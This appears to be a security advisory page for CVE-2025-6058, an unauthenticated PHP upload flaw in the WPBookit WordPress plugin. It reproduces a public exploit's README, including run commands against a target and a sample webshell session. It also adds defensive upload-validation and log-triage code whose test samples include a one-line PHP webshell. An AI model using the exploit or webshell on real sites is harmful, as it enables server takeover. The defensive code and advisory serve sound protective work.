WordPress WPBookit File Upload Vulnerability

Vulnerability Information

Vulnerability name: WordPress WPBookit File Upload Vulnerability

Vulnerability IDs:

  • CVE: CVE-2025-6058

Vulnerability type: File upload

Severity: Critical

Vulnerability description:

Affected products

WordPress is a widely used content management system (CMS) adopted by millions of websites worldwide. WPBookit is a WordPress plugin that provides appointment and booking functionality. Because it is easy to use and feature-rich, WPBookit is fairly common on business and personal websites.

Vulnerability details

CVE-2025-6058 is a critical vulnerability in the WordPress WPBookit plugin, classified as an unauthenticated file upload. An attacker can use a vulnerable AJAX endpoint to upload arbitrary PHP files and achieve remote code execution (RCE) without any authentication. The technical root cause is that the plugin fails to properly validate the type and content of uploaded files, so malicious scripts can be uploaded.

Impact analysis

This vulnerability allows an unauthenticated attacker to upload a malicious PHP file and thereby gain full control of the target site. The attacker can execute arbitrary code, access sensitive data, and even disrupt the site's normal operation. Because exploitation requires no authentication and can be automated, the risk is very high. Every WordPress site running an affected version of the WPBookit plugin is exposed to a serious security threat.
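The root cause stated above is missing validation of an uploaded file's type and content. The following is an added example, written for this page and not taken from the WPBookit plugin or the linked repository: a generic Python upload validator showing the checks that stop a PHP file from being stored under a web-served directory. The allowed types (images and PDFs), the size limit and the magic-byte table are assumptions chosen for a booking form; the WordPress-specific equivalent would be the core `wp_check_filetype_and_ext()` check, which this code does not call.

```python
"""Upload validation of the kind the description above says the plugin lacked.
Added example in generic Python; not the plugin's own code. Allowed types are an assumption."""
from __future__ import annotations

import os
import re
import secrets

# Assumption: a booking form only ever needs images and PDF attachments.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf"}

# Leading bytes each allowed type must start with (declared type must match real content).
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

# Extensions a PHP-enabled web server may execute; banned from every dotted segment of the name,
# because some server configurations dispatch on any segment, not only the last one.
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "pht", "phps"}

# A PHP open tag anywhere in the body means the file is a script, whatever its name says.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def validate_upload(filename: str, data: bytes, max_bytes: int = 5 * 1024 * 1024) -> tuple[bool, str]:
    """Return (accepted, reason). Accept only when name, size, magic bytes and body all agree."""
    if not filename or filename != os.path.basename(filename):
        return False, "directory components in filename"
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0] or not parts[-1]:
        return False, "missing extension"
    ext = parts[-1]
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not allowed"
    if any(p in SCRIPT_EXTENSIONS for p in parts[:-1]):
        return False, "script extension embedded in filename"
    if not data or len(data) > max_bytes:
        return False, "size out of range"
    if not any(data.startswith(m) for m in MAGIC[ext]):
        return False, "content does not match declared type"
    if PHP_OPEN_TAG.search(data):
        return False, "PHP open tag inside file body"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Random on-disk name so the uploader can neither choose nor predict the resulting URL."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed inputs: a real PNG header, and a script body under several disguises.
    samples = [
        ("ghost_shell.php", b"<?php system($_GET['cmd']); ?>"),
        ("photo.jpg", b"\xff\xd8\xff\xe0" + b"<?php echo 1; ?>"),
        ("shell.php.jpg", b"\xff\xd8\xff\xe0"),
        ("photo.png", b"\x89PNG\r\n\x1a\n" + bytes(32)),
    ]
    for name, body in samples:
        ok, why = validate_upload(name, body)
        print(f"{name:18} -> {'accept' if ok else 'reject'} ({why})")
```

The extension and magic-byte checks cover the plain case; the embedded-extension and open-tag checks cover the disguised cases a validator that only looks at the last extension would miss. Storing under a random name is a separate control: even if a bad file slips through, the uploader does not know its URL.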

Vendor: WordPress

Product: WPBookit

Affected versions: ≤ 1.0.4

Source: https://github.com/0xgh057r3c0n/CVE-2025-6058

Type: CVE-2025:github search

Repository files

  • .gitignore
  • CVE-2025-6058.py
  • CVE-2025-6058.yaml
  • LICENSE
  • README.md

Source overview

🚨 CVE-2025-6058 — WordPress WPBookit ≤ 1.0.4 Unauthenticated File Upload Exploit

Unauthenticated Arbitrary File Upload Exploit targeting WordPress WPBookit Plugin (≤ 1.0.4)
Exploit allows remote shell upload and full command execution.

Author: 0xgh057r3c0n


📌 About The Vulnerability

CVE-2025-6058 is a critical vulnerability affecting the WPBookit plugin on WordPress CMS. An unauthenticated attacker can abuse a vulnerable AJAX endpoint to upload arbitrary PHP files, enabling Remote Code Execution (RCE).

  • 🎯 Target: WordPress CMS (vulnerable WPBookit plugin)
  • 📦 Plugin Affected: WPBookit ≤ 1.0.4
  • ⚠️ Risk Level: Critical (Unauthenticated RCE)

✨ Features

  • 🔍 Auto-detects WordPress plugin version via README.txt
  • 📤 Uploads lightweight PHP shell (ghost_shell.php)
  • 🖥️ Interactive shell (Parrot-style prompt)
  • 🌐 Unauthenticated — No login required
  • 🎨 Colorized CLI Output

🚀 Usage Guide

💻 Requirements

```bash
python3 --version
pip install requests
```

---

#### ⚙️ Exploit Execution

```bash
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com
```

🛠️ Example Shell Session

```text
python3 CVE-2025-6058.py -u https://victim.com

[>] Checking plugin version...
[+] Found plugin version: 1.0.4
[!] Target version is vulnerable.

[>] Uploading shell...
[+] Upload successful.
[+] Shell URL: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

[!] Interactive GhostShell Started — type 'exit' to quit.

┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data
```

📂 Shell Details

  • File Name: ghost_shell.php
  • Path: /wp-content/uploads/YYYY/MM/ghost_shell.php
  • Example: https://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

This exploit is developed for educational purposes and authorized penetration testing only. Unauthorized use against systems without explicit consent is illegal.

📄 License

Released under MIT License

Made for WordPress security auditing 🛡️ by 0xgh057r3c0n
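The README above gives the observable footprint of this PoC: a version check against the plugin's README.txt, a POST to an AJAX endpoint, and then requests to a PHP file under /wp-content/uploads/ with a `cmd` query parameter. The following is an added example for defenders, not part of the linked repository: a small Python triage script that runs over web server access logs in combined format and flags that chain. The log lines are constructed for the example (documentation IP ranges), the plugin directory slug `wpbookit` in the first line is an assumption, and nothing in WordPress legitimately serves a PHP file from the uploads tree, which is why any such request is reported even without the other signals.

```python
"""Access-log triage for the webshell pattern described above.
Added example with constructed log lines; not code from the original repository."""
from __future__ import annotations

import re
from collections import defaultdict
from urllib.parse import parse_qs

# Combined log format; the referrer and user-agent tail is not needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# Any PHP-family file under the uploads tree (WordPress never needs to execute one there).
UPLOADS_SCRIPT = re.compile(r"^/wp-content/uploads/.*\.(php\d?|phtml|phar|pht)$", re.IGNORECASE)
# Version probe: the PoC above reads the plugin's README.txt to decide whether to proceed.
PLUGIN_README = re.compile(r"^/wp-content/plugins/[^/]+/readme\.txt$", re.IGNORECASE)
AJAX_PATH = "/wp-admin/admin-ajax.php"

# Constructed sample log. 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges;
# the plugin slug "wpbookit" in the first line is assumed, not taken from the page.
SAMPLE_LOG = """\
198.51.100.7 - - [22/Jul/2025:10:15:01 +0000] "GET /wp-content/plugins/wpbookit/readme.txt HTTP/1.1" 200 1843 "-" "python-requests/2.32.3"
198.51.100.7 - - [22/Jul/2025:10:15:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 57 "-" "python-requests/2.32.3"
198.51.100.7 - - [22/Jul/2025:10:15:03 +0000] "GET /wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami HTTP/1.1" 200 9 "-" "python-requests/2.32.3"
203.0.113.5 - - [22/Jul/2025:10:16:10 +0000] "GET /wp-content/uploads/2025/07/flyer.pdf HTTP/1.1" 200 88213 "-" "Mozilla/5.0"
203.0.113.9 - - [22/Jul/2025:10:17:44 +0000] "GET /wp-content/uploads/2024/11/old_backup.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""


def triage(lines) -> list[dict]:
    """One finding per request for a script under wp-content/uploads, escalated to 'high'
    when a command parameter is present or the same client showed the earlier steps of the chain."""
    findings: list[dict] = []
    earlier_signals: dict[str, set[str]] = defaultdict(set)  # client ip -> signals seen so far
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, url, status = m["ip"], m["method"], m["url"], m["status"]
        path, _, query = url.partition("?")
        if PLUGIN_README.match(path):
            earlier_signals[ip].add("plugin readme fetched")
        if method == "POST" and path == AJAX_PATH:
            earlier_signals[ip].add("POST to admin-ajax.php")
        if not UPLOADS_SCRIPT.match(path):
            continue
        reasons = ["script file requested under /wp-content/uploads/"]
        severity = "medium"
        if "cmd" in parse_qs(query):
            reasons.append("command parameter in query string")
            severity = "high"
        if earlier_signals[ip]:
            reasons.append("same client earlier: " + ", ".join(sorted(earlier_signals[ip])))
            severity = "high"
        if status == "200":
            reasons.append("server returned 200: the file is present")
        findings.append({"ip": ip, "time": m["ts"], "path": path, "status": status,
                         "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG.splitlines()):
        print(f"[{f['severity']}] {f['ip']} {f['time']} {f['path']} ({f['status']})")
        for r in f["reasons"]:
            print("    -", r)
```

A 404 on a PHP path under uploads (the last sample line) is reported at medium severity because it is still a probe worth knowing about; a 200 with a `cmd` parameter from a client that first fetched a plugin readme and posted to admin-ajax.php is the full chain and should go straight to incident response, with the file under /wp-content/uploads/ preserved for forensics before removal.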

http://example.com/2025/07/22/github_1966187907/
Author: lianccc
Published: 22 July 2025